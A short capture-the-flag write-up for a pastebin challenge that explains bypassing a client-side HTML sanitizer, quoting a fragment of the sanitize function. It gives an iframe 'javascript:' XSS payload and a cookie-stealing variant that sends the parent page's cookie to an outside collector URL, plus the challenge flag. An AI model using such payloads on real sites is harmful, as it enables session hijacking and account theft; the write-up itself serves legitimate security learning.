
This seems to be similar to web/static-pastebin, with the exception that we can add few HTML tags and attributes, Digging into the souce code reveals this 'sanitize' function which performs client side sanitization of input txt

function sanitize(element) {
const attributes = element.getAttributeNames();
for (let i = 0; i < attributes.length; i++) {
// Let people add images and styles
if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) {

const children = element.children;
for (let i = 0; i < children.length; i++) {
if (children[i].nodeName === 'SCRIPT') {
i --;
} else {
From the script, we understand that we can have any tag, ( except <SCRIPT> as it gets removed ), and few attributes Sending the same payload as before won't work because onerror attribute is not allowed.

Playing around with it , I found that iframes with src attribute are possible.

`<iframe src="javascript:alert(1)">`
For extracting the cookie, I wrote the following payload, which redirects the iframe to a known URL with the parent sites cookie in query string

`<iframe src="javascript:document.location='https://anandu.free.beeceptor.com/?c'+this.parent.document.cookie+'>'"></iframe>`
And we get the flag as flag{wh0_n33d5_d0mpur1fy}

Original writeup (https://anandu.net/blog/redpwnctf2020-writeup/).